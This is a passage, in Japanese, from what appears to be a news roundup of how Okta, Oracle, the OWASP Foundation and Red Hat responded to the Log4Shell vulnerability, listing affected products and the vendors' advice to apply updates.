Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。